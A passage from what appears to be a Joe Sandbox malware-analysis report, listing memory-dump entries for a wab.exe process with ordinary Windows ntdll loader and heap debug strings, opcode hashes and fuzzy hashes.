                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                            • API String ID: 0-3223716464
                                            • Opcode ID: 7efc17ce6e61288a2b14cfefe83d63a7d007daabce9d4bca6faca5b598faeb95
                                            • Instruction ID: 6c01ee0687c8c689d5a37f8e9b546b6a65e07f687dab6e2bfc49dc565e77ae13
                                            • Opcode Fuzzy Hash: 7efc17ce6e61288a2b14cfefe83d63a7d007daabce9d4bca6faca5b598faeb95
                                            • Instruction Fuzzy Hash: B7913732A01365AFD322EF248C81B6A77B9AF64714F0509D8F955AF251C738EF01CB96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-523794902
                                            • Opcode ID: e4eb8c4212634806f4658994ba18d0356f602629ff71faf36b72ebd0b3edbadb
                                            • Instruction ID: e9907d5964357b60db5f08ae7bf57f16d04b89e80def13a143044b10a45025c3
                                            • Opcode Fuzzy Hash: e4eb8c4212634806f4658994ba18d0356f602629ff71faf36b72ebd0b3edbadb
                                            • Instruction Fuzzy Hash: DA42E031618781AFC315DF28C880B1AB7E9FF94604F4949EAE599CB352D734EA81CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.1#
                                            • API String ID: 0-3794626342
                                            • Opcode ID: 25f4e33778a2b7ee582216800fd3fd5a1a431de7370da545639176e14c0a8597
                                            • Instruction ID: 0aceff7028522727691778f0ab661a1d64489b9f53f9a84ea2628cd128f9e2d5
                                            • Opcode Fuzzy Hash: 25f4e33778a2b7ee582216800fd3fd5a1a431de7370da545639176e14c0a8597
                                            • Instruction Fuzzy Hash: 8EF148B2D11218EFDB15DF99C980EDEBBBCEF18610F1545AAE501E7210EB709F418BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                            • API String ID: 0-122214566
                                            • Opcode ID: f42b200cbfa1da6ae895ef1c4c91a453b22f488069a5f0fcfd5deea9df6d05af
                                            • Instruction ID: 7e04fef89c3d20341d79a22c576e50cdbb2e722c13c5189acddeee40818c87d6
                                            • Opcode Fuzzy Hash: f42b200cbfa1da6ae895ef1c4c91a453b22f488069a5f0fcfd5deea9df6d05af
                                            • Instruction Fuzzy Hash: 36C11531E012159BDB149B64CC91FBE7BA9AF59700F1841E9E912EF291E7B4CF44C391
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-792281065
                                            • Opcode ID: 257ee6a36b10a6e691e9720d5572151ef425ee5cb436e24dd4cae4d69f221110
                                            • Instruction ID: ca18f4835fd6841321b03af00f52194f1399e5d16d42eee0eeb9348690a9d544
                                            • Opcode Fuzzy Hash: 257ee6a36b10a6e691e9720d5572151ef425ee5cb436e24dd4cae4d69f221110
                                            • Instruction Fuzzy Hash: F0912431E01B259FD735AF50CC44F9A7BA8AF20720F1401D9E611AB29AD7B89F41CB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                            • API String ID: 0-1745908468
                                            • Opcode ID: 913387422ad413c83d6bdadd9c1e72268cbbd76aaff322ec50eb7498ffacd707
                                            • Instruction ID: 04bbaf327162520bc345ad8cb2b84922ad60c13189763734c6bbc8fc5f745f90
                                            • Opcode Fuzzy Hash: 913387422ad413c83d6bdadd9c1e72268cbbd76aaff322ec50eb7498ffacd707
                                            • Instruction Fuzzy Hash: 27910E36900745DFEB12DFA8C880A9DBBF6FF59311F1884C9E445DB652C739AA80CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • SXS: %s() passed the empty activation context, xrefs: 23361F6F
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 23361FC9
                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 23361FA9
                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 23361F8A
                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 23361F82
                                            • RtlGetAssemblyStorageRoot, xrefs: 23361F6A, 23361FA4, 23361FC4
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                            • API String ID: 0-861424205
                                            • Opcode ID: b7183ecdb298d3f930197fecb4c811d86b7c04b9f849ffc8a3704488c93bbfe1
                                            • Instruction ID: 7cfc82cc5fff924123ef18fd9c9972b2713da1144c9bb7f9eae258618afa8e5d
                                            • Opcode Fuzzy Hash: b7183ecdb298d3f930197fecb4c811d86b7c04b9f849ffc8a3704488c93bbfe1
                                            • Instruction Fuzzy Hash: 7131E977E001247FE7209E89DC80F5B7B7CAB51A50F0542D5B911FB24AC270AF41CAE9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1975516107
                                            • Opcode ID: afac22a1e376836d1421d395b8dc458dfe67f079002a9b3e818767bee45467b8
                                            • Instruction ID: 02ea4afbaa031eb16c4fa10b5c19e4e4879b4befeae86769f197b39510efd311
                                            • Opcode Fuzzy Hash: afac22a1e376836d1421d395b8dc458dfe67f079002a9b3e818767bee45467b8
                                            • Instruction Fuzzy Hash: FB511572E00345CFDB29EFA4C880BAEBBF5BF55304F14419AE541AB292D7789B51CB80
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                            • API String ID: 0-3061284088
                                            • Opcode ID: 697bc7cd5da98edfc00b865401720f5504e0535800297f86e26a335e6aac47bb
                                            • Instruction ID: e10cf04d99b14d51dd298cf5b59c30ce783ee76ff5b9d926a27002a3049feb08
                                            • Opcode Fuzzy Hash: 697bc7cd5da98edfc00b865401720f5504e0535800297f86e26a335e6aac47bb
                                            • Instruction Fuzzy Hash: A8014C324192809ED3159729DC59F4277D8EF52730F2A48C9F1188B9928AA5FAC0F764
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LU,#$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                            • API String ID: 0-1892452913
                                            • Opcode ID: acfdb89955246eec27e41f9f7167593dec9cb38e050366aa777542c0bbacb7db
                                            • Instruction ID: d53fce9e43c821eb6e984c9e5c5646bc4f4b9c191f89782fab25133cd4e1f624
                                            • Opcode Fuzzy Hash: acfdb89955246eec27e41f9f7167593dec9cb38e050366aa777542c0bbacb7db
                                            • Instruction Fuzzy Hash: E1B17935A12605CBCB24DF69C890F99B7B5AF88724F1489ADE951EB790D730EA80CB14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                            • API String ID: 0-379654539
                                            • Opcode ID: f84ffaeecf76970145cf9014c6b3b29ca053d6f6df7a9d17a599de9db5423016
                                            • Instruction ID: 59f556352caccf9d692c4ec09432dd9a0ada6ec324ba6406ea4fc3f608b02aa1
                                            • Opcode Fuzzy Hash: f84ffaeecf76970145cf9014c6b3b29ca053d6f6df7a9d17a599de9db5423016
                                            • Instruction Fuzzy Hash: 79C17971518782CFD711DF18C880B5AB7E4BF88704F0489AAF995CB261E734DA89CF56
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • minkernel\ntdll\ldrinit.c, xrefs: 23328341
                                            • @, xrefs: 233284B1
                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 2332847E
                                            • LdrpInitializeProcess, xrefs: 23328342
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1918872054
                                            • Opcode ID: b971cd91f56e6b9c382fd5dbc82bc7dfbff784cd4bca2bb56690995f34baa587
                                            • Instruction ID: f47f4b87ae3ac2d2bbdb9b89ae36769ab10a7ad803d0443971400cc1f952d1a9
                                            • Opcode Fuzzy Hash: b971cd91f56e6b9c382fd5dbc82bc7dfbff784cd4bca2bb56690995f34baa587
                                            • Instruction Fuzzy Hash: BA918C71919780AFE321DA20CC40EABBBECBF94754F0449AEF684C6151E734DB44CB96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • SXS: %s() passed the empty activation context, xrefs: 23361FE8
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 233620C0
                                            • .Local, xrefs: 233227F8
                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 23361FE3, 233620BB
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                            • API String ID: 0-1239276146
                                            • Opcode ID: e41dfac618179eff4193aeb4bf74140cb373423ade23690d505268c85807835f
                                            • Instruction ID: 9e686408999f554c0de1f928bac90e01c84e0fac5d98fdf2a4dc4835c3a5d55d
                                            • Opcode Fuzzy Hash: e41dfac618179eff4193aeb4bf74140cb373423ade23690d505268c85807835f
                                            • Instruction Fuzzy Hash: 98A196319106299FCB20DF64CC88B99B7B4BF18314F1501EAD908EB256D774AF85CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}-#
                                            • API String ID: 0-713020331
                                            • Opcode ID: 76d32c30ac0d7bcf7f83229541485caa888ac70dc9f2a1a66b3eba1a7c9e63d6
                                            • Instruction ID: 126ac570a23f711a9386c8fce59f1cde8a5fca770d373e29c7765204bf2cd45a
                                            • Opcode Fuzzy Hash: 76d32c30ac0d7bcf7f83229541485caa888ac70dc9f2a1a66b3eba1a7c9e63d6
                                            • Instruction Fuzzy Hash: D0817C75609340AFD711DB14C880B6AB7E8FF85760F0849ADFA91DB390DBB4DA40CB96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LU,#$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                            • API String ID: 0-385024182
                                            • Opcode ID: 2165fccd743dd407b9a64fb9a37f038cea2a0f6d7642fc67f01714635bf3961c
                                            • Instruction ID: 738895262eb611b8608d1c707b966346da3e3a4bc965292a4d507fc5c0b99463
                                            • Opcode Fuzzy Hash: 2165fccd743dd407b9a64fb9a37f038cea2a0f6d7642fc67f01714635bf3961c
                                            • Instruction Fuzzy Hash: EA91DD71A0564ACBDB22DF54CD50BAEB7B4FF04364F2885D9E911AB390D378DA80CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 23350DEC
                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 23350E2F
                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 23350E72
                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 23350EB5
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                            • API String ID: 0-1468400865
                                            • Opcode ID: 009845fbca1fa74df2aa08ab597b93efd6b5da96887e22871b83e8c0019e731c
                                            • Instruction ID: bad59d60375228fd089b6f9472eb3f62fc06e265f1ebb136b6007423f6ebdf5c
                                            • Opcode Fuzzy Hash: 009845fbca1fa74df2aa08ab597b93efd6b5da96887e22871b83e8c0019e731c
                                            • Instruction Fuzzy Hash: 7A71DBB19087459FC760EF10CC85F8BBBA8EF95764F5405A8F9488B246C335E288CBD2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                            • API String ID: 0-2586055223
                                            • Opcode ID: 46aa9201394e7b80aeb4ed2355deb5a64035339c5bab105e1dcf5d3554d4e81d
                                            • Instruction ID: cab9ddd7945d37abdcb9c10541aa3a322f920645830025bb124ab83685bf4f6f
                                            • Opcode Fuzzy Hash: 46aa9201394e7b80aeb4ed2355deb5a64035339c5bab105e1dcf5d3554d4e81d
                                            • Instruction Fuzzy Hash: 6A61E232A45781AFD321DB64CC45F57B7E8EF84B50F0909D9FA68CB291D634EA40CB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • minkernel\ntdll\ldrinit.c, xrefs: 2335A7AF
                                            • DG,#, xrefs: 23312382
                                            • LdrpDynamicShimModule, xrefs: 2335A7A5
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 2335A79F
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DG,#$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-642172007
                                            • Opcode ID: bdd9dcdab6a577c636f9485d66af4acd98622f541e3cb1b66c00e5940f1f0545
                                            • Instruction ID: 0c9822e28e7aeeb7a9ef1696f193be35c2408c3f9ca24097052706ea027f0cea
                                            • Opcode Fuzzy Hash: bdd9dcdab6a577c636f9485d66af4acd98622f541e3cb1b66c00e5940f1f0545
                                            • Instruction Fuzzy Hash: B4310676A00200EFD726AF59CC80E6A77BDFF98720F1800D9F911A7242D7749B86DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                            • API String ID: 2994545307-1391187441
                                            • Opcode ID: 2211f05b90eebc7fce7f36611863d66c81825ec4a32023f148aed9ed70c45e3c
                                            • Instruction ID: 86b1750e89de8d37f778bd562ec5e4465a0609ce4d02e6898b33b6380e316355
                                            • Opcode Fuzzy Hash: 2211f05b90eebc7fce7f36611863d66c81825ec4a32023f148aed9ed70c45e3c
                                            • Instruction Fuzzy Hash: 3231EF3AD00249EFCB11DB55CC85F9AB7FCEB45A60F1540E2F918AB291D670FA80CA61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$e2#
                                            • API String ID: 0-2917186987
                                            • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                            • Instruction ID: 4d9ce45f5656375bf4313811b12ad175e452ee7de7c346b1179f5639c0e00760
                                            • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                            • Instruction Fuzzy Hash: 02319E72D11619BFDB219B94CD40EDEBBBDEB95710F0080A5EA14E7260DB30DB059BD0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $ $0
                                            • API String ID: 0-3352262554
                                            • Opcode ID: bb417d728037d2e817f034762bda33053919cb767dc66bb461ba9b6cfb27ce11
                                            • Instruction ID: 16c82be498690b5636067df067ab4b1b7d0c64076e13a449685aefe23e45e401
                                            • Opcode Fuzzy Hash: bb417d728037d2e817f034762bda33053919cb767dc66bb461ba9b6cfb27ce11
                                            • Instruction Fuzzy Hash: 5032F3B1A08381CFE350CF68C884B5BBBF9BB88344F0449AEF59987251D775DA48CB56
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            • Opcode ID: 19b6a06c5fb15a659c9e1045cd5a2b7b94737fb99cb189dd349d5b3e47327958
                                            • Instruction ID: a4d9300f5d39193a998fd2e3feed9d2da17796d2b8bf1bed6ad1e1c3cc45fc90
                                            • Opcode Fuzzy Hash: 19b6a06c5fb15a659c9e1045cd5a2b7b94737fb99cb189dd349d5b3e47327958
                                            • Instruction Fuzzy Hash: 4EF18971A00605DFEB15DF68C894F6AB7B9FF48700F1482E9E5169B291D734EB81CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
